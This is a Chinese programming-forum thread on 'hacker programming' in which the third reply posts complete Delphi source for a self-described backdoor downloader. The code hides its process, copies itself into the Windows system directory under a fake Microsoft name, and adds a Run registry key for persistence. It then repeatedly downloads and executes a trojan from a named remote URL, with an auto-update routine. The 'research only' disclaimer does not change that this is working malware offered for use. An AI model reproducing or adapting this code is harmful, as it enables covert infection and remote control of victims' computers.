回 帖 发 新 帖 刷新版面

主题:黑客编程讨论

讨论一下黑客编程吧!
[em2]

回复列表 (共3个回复)

沙发

你自己开个头阿?

板凳

穿黑衣,戴黑帽,
黑手套,黑袜子,
怀揣黑心一大颗。

3 楼

看黑客们写后门写地那么起劲,我也来爽一把。过过黑客瘾
小菜后门,随便写写玩的。
Program Houmen;
{
冰剑骇客程序下载后门 
BinJian Downloader
versoin 1.4
作者:冰剑
警告:后门程序仅做研究,任何形式的利用,都将承担不可估量的法律刑事责任。
-----------------------------------
by BinJian at 2007.3.25 PM 19:29
[versoin 1.0]
  最初雏形核心 BinJian Cracker Download Shell (BCDS) 
[versoin 1.1]
  特点:复制自身 进程隐藏 自启动运行
  作用:从指定网站上(URL)下载 Cracker(木马病毒或恶意程序)
[versoin 1.2] 2007.2.15 AM 12:38
  1.改进自我保护模块的自启动部分。
  2.增加监视注册表功能。
  3.增加隐藏模式,解决在由于伪装错误窗口模块而引起的Windows启动时易暴露后门目标的问题。
(403KB) us UPX 2.01 (164KB)
[versoin 1.3] 2007.3.1 PM 16:45
  1.核心代码完全重写,重写至 at Win32 控制台(CONSOLE) 环境。
  2.剔除隐藏模式,剔除伪装错误窗口模块。
  3.采用全新的后门程序结构(Win32 CONSOLE),以及第二项的改进,
    完全解决了在Windows启动时易暴露后门目标的问题。
  4.剔除部分程序代码,程序执行效率增强,精简后门程序体积。
(89KB) us UPX 2.01 (40.5KB)
[varsoin 1.4] 2007.3.25 PM 19:29
  1.隔秒检查模块优化,增加时间间隔。
  2.改进后门核心,增加Updata功能模块,当检测到本地文件版本与远程文件版本不符时,自动更新。
  注:1.4于1.3以及之前版本服务端配置结构不兼容,1.4版本需要单独配置远程版本文件,
  否则可能导致无法正常使用Updata模块,或者工作不正常。
(91.5KB) us UPX 2.01 (41KB)
~~~~~~
by BinJian (c)2007-2046 Delphi 7 Bulid 4.453 + Windows XP SP2 Build 2600
}
uses
  SysUtils,Windows,Urlmon,Registry,HideProcess;
const
  Url='http://ati.tw.cn/1.exe';                   {cracker 程序列表下载地址 URL}
  CrackerFileName='wupdmgrs.exe';                 {下载的 cracker 更名地址}
  ProgramName='msmsgs.exe';                       {伪装程序名}
  RegKeyName='msmsgs';                            {启动项名称}
  CrackerVerFile='http://ati.tw.cn/ver.txt';      {远程版本文件} 
  CrackerVerBDFile='ver.txt';                     {本地版本文件} {去系统目录}
  BCrackerVerBDFile='ver2.txt';                   {临时版本文件} {去系统目录}
  t=2000;                                         {每各t秒,检查自启动项和cracker}
var
  SystemPathName,CrackerPathName,ProgramPathName,TBCrackerVerBDFile,TCrackerVerBDFile:string;
{------------------------------------------------------------------------------}
Function GetWinDir:String;        {取得 Windows/System32 系统路径}
var
  Buf:array[0..MAX_PATH]of char;
begin
  GetSystemDirectory(Buf,MAX_PATH);
  Result:=Buf;
  if Result[Length(Result)]<>'\' then Result:=Result+'\';
end;
Function Readint(S:String):Longint;      {读取版本文件中的数值}
  Var
    F:text;
    P:Longint;
begin
   if FileExists(S)  then
   begin
     assignfile(F,S);
     reset(F);
     read(F,P);
     closefile(F);
     result:=P;
   end;
end;
procedure Download;                     {下载木马} {核心模块}
begin
  URLDownloadToFile(nil,pchar(TCrackerVerBDFile),pchar(TBCrackerVerBDFile),0,nil);
  if (Readint(TCrackerVerBDFile)<>Readint(TBCrackerVerBDFile))
  or(FileExists(CrackerPathName)=False)
  then URLDownloadToFile(nil,url,pchar(CrackerPathName),0,nil);
  if FileExists(CrackerPathName) then
  WinExec(pchar(CrackerPathName),Sw_Show);  {运行}
end;
{自我保护模块.Begin}
procedure RegKey;   {开机自动运行}
var
  Reg:TRegistry;
begin
  Reg:=TRegistry.Create;
  Reg.RootKey:=HKEY_LOCAL_MACHINE;
  Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);
  if Reg.ValueExists(RegKeyName)=False then {如果键 RegKeyName 不存在 则添加}
  Reg.WriteString(RegKeyName,ProgramPathName);
  Reg.CloseKey;
  Reg.Free;
end;
procedure CopyMe;         {复制自身}
begin
  SystemPathName:=GetWinDir+ProgramName;  {获得自我复制的路径(SystemPathName)}
  if (ProgramPathName<>SystemPathName)and(Fileexists(SystemPathName)=False) then   {比较当前目录是否与SystemPathName相同,并且SystemPathName下的自身不存在}
  begin    {如果不是,则自我复制到 SystemPathName 并运行}
    Copyfile(Pchar(ProgramPathName),Pchar(SystemPathName),False);
    Winexec(Pchar(SystemPathName),Sw_show);
    Halt;
  end;
  if (Fileexists(SystemPathName)=False) then Halt;
end;
procedure Inspection; {每隔t秒检查 Cracker 程序,保证其完整性}
begin
  Repeat
    Sleep(t*1000); { 转换T为毫秒 毫秒*1000=秒 }
    RegKey;
    Download;
  Until 1=2;
end;
{自我保护模块.End}
begin
  MyHideProcess;              {自我保护功能,进程插入模块启动}
  ProgramPathName:=ParamStr(0);           {获得程序当前路径}
  CrackerPathName:=GetWinDir+CrackerFileName;        {获得CrackerPathName 的路径 CrackerFileName}
  TBCrackerVerBDFile:=GetWinDir+BCrackerVerBDFile;   {获得BCrackerVerBDFile 的路径 TBCrackerVerBDFile)}
  TCrackerVerBDFile:=GetWinDir+CrackerVerBDFile;     {获得CrackerVerBDFile 的路径 TCrackerVerBDFile}
  Download;  {启动下载核心模块}
  CopyMe;    {判断程序是否在系统目录,如果不是自我复制}
  RegKey;    {注册自启动注册表}
  Inspection; {开始循环模式}
end.

完全源代码下载,编译后40KB.

http://www.cnare.cn/blog/article.asp?id=4

我来回复

您尚未登录,请登录后再回复。点此登录或注册